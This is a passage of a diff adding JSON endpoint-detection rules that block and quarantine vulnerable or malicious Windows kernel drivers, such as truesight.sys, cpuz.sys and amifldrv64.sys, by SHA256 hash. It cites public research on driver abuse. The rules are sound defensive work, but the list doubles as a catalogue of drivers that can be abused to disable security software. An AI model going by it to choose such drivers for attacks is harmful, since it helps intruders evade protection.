[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d1e4ea94-73c3-5785-817c-3fdd4125a984", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605717Z", + "creation_date": "2026-03-23T11:45:29.605719Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605725Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f56db12cd91af1190611be06668b76f8456b8cbfd67b1b41e90a0aeeab61ebb0", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d1ee41bb-76ee-5d78-b3b5-2af43b5e7abf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812839Z", + "creation_date": "2026-03-23T11:45:31.812841Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812846Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "10d4da8b187122f5f1b1168fec9eda3fcd829d03a763953234230d4005611a7d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d1eebb4d-5dde-58d5-899b-e8ee5afb4f63", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823749Z", + "creation_date": "2026-03-23T11:45:31.823751Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823756Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab540cd5d179dab65b26b519e0d42e785776349d2d1b847e8d2592c324d86249", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"d1f90a58-55a1-5699-bb20-0cfe472cbf6a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982624Z", + "creation_date": "2026-03-23T11:45:29.982626Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982632Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "baa89ffd5255e5c72112ed57937353ae48a050c9af423cbde6b380978ecc235c", + "comment": "Vulnerable Kernel Driver (aka driver7-x86-withoutdbg.sys) [https://www.loldrivers.io/drivers/d9f2c3d6-160c-4eb3-8547-894fcf810342/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d1fbdc3f-d254-5880-ba10-57334da1519f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.158822Z", + "creation_date": "2026-03-23T11:45:31.158824Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.158830Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c58c16ad52d4f2ef42ee77c5e46aa315c8d412833b36ce54034a9a43c18f533", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d1ff7cab-69da-53e3-bf34-f3f0fe1bd8a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144464Z", + "creation_date": "2026-03-23T11:45:31.144466Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144471Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dadef39b191a5c4e4007a9720560d7e39b913b12556295fe11b3b0ca923a0e59", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2005d8f-7c42-5a45-b3bd-dac6934ff79b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832862Z", + "creation_date": "2026-03-23T11:45:30.832865Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832888Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e30a49fce3e7db881497882c0a846b8f9834acd7443f895b1d40eaaad5f87d0b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2229195-9c0d-57cc-af75-7ce8a31c0d27", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616922Z", + "creation_date": "2026-03-23T11:45:29.616923Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616929Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "846cc7c9bf2eab3400e66481568a010fb0dfbac01416a99258a4baabf1e10d35", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2249eee-afff-58b6-a4a3-81a4acfc1203", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620238Z", + "creation_date": "2026-03-23T11:45:29.620240Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620245Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "607dc4c75ac7aef82ae0616a453866b3b358c6cf5c8f9d29e4d37f844306b97c", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2287136-c99e-52e3-8252-aa56fd089000", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477666Z", + "creation_date": "2026-03-23T11:45:30.477669Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477679Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "828a18b16418c021b6c4aa8c6d54cef4e815efca0d48b9ff14822f9ccb69dff2", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d232e2e3-a3b0-5ea6-88c0-81ca9e6b3933", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620780Z", + "creation_date": "2026-03-23T11:45:29.620782Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620787Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) 
[https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d23ab5aa-cc19-5bc6-82b5-a074bc6c9317", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816283Z", + "creation_date": "2026-03-23T11:45:30.816285Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816291Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a450ae0c9258ab0ae64f126f876b5feed63498db729ec61d06ed280e6c46f67", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d23dce60-e7fb-52fd-9d64-54b57653d087", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495437Z", + "creation_date": "2026-03-23T11:45:31.495439Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495445Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ca64e58831171214a5f49d3c2ae83c46669b022c4bbb4ab4f49ab7ac0fc5fd67", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d25363fc-6497-5df1-b3ba-d6726bb6e4d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821982Z", + "creation_date": "2026-03-23T11:45:30.821984Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821990Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb3176deae54472750747167287284c3cda5e14248ee10844305f322adcb81cd", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d25af5ed-5ae9-5018-8992-65353fe7079b", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459737Z", + "creation_date": "2026-03-23T11:45:30.459740Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459749Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6709a2d7925248fe172e9bc5495f45b9bb74060c43e1c58e671f0e6c434fd82b", + "comment": "Vulnerable Kernel Driver (aka test2.sys) [https://www.loldrivers.io/drivers/6356d7d9-3b82-4731-9d5f-cc9bc37558fc/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d26f861f-e07a-59a8-8371-721a13f168fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490226Z", + "creation_date": "2026-03-23T11:45:31.490228Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490233Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f0ac2c9641ea50b272f1a2cb08a88ead32edb2de195df812449289be84f8c62f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d27183e2-c2de-5b8e-81c7-9ec653d0e0c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976742Z", + "creation_date": "2026-03-23T11:45:29.976745Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976754Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ef9e759f95645dbce0c49fe1e97838051a67c42995953778a651e3d8d017217", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d271e804-f286-57e3-89b6-59dada33c423", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159246Z", + "creation_date": "2026-03-23T11:45:31.159248Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159254Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79e7bcc95f41c982a31e879826379c810340acdd5c8edc1493e06fd46e4fa893", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d27fc381-1eb0-5e9c-ad63-fbcdca0e6641", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823918Z", + "creation_date": "2026-03-23T11:45:31.823921Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823929Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c04912772a57ed2d216458e80775cba8ef389b777beee0556128230b7ad5ced0", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d28a4c5e-ccad-55f2-8977-d0c535df5171", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981111Z", + "creation_date": "2026-03-23T11:45:29.981113Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981119Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa21e3d2bfb9fafddec0488852377fbb2dbdd6c066ca05bb5c4b6aa840fb7879", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d29454b7-f813-5cb0-9adc-0f7fc6cfe15f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.833507Z", + "creation_date": "2026-03-23T11:45:30.833510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833519Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c007d8eb2f4a41275b9bc2850e37a40f699d2c94c4abce164ce236eaaf7ca7c0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d29b0584-ef2d-5ba9-a2bb-717e94786590", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146168Z", + "creation_date": "2026-03-23T11:45:31.146170Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "852e9260b9ee80f78ba23936fbb9e75eb7a841a9f9e486af65fcdac855884e64", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2a3877c-5c78-595d-b0da-8b4af75129d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472344Z", + "creation_date": "2026-03-23T11:45:30.472348Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8d6ce1c86cbd616bb821698037f60a41e129d282a8d6f1f5ecdd37a9688f585", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2a72fd1-485c-59fb-aaf3-6118a99ec421", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493626Z", + "creation_date": "2026-03-23T11:45:31.493629Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.493638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c9dbc78d1953e9a177d2eac79f5a4174ea65a1889a99a356f3a6412ec3ba397", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d2a94f44-76dd-5f03-9a4d-aaa73cb1f5a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835807Z", + "creation_date": 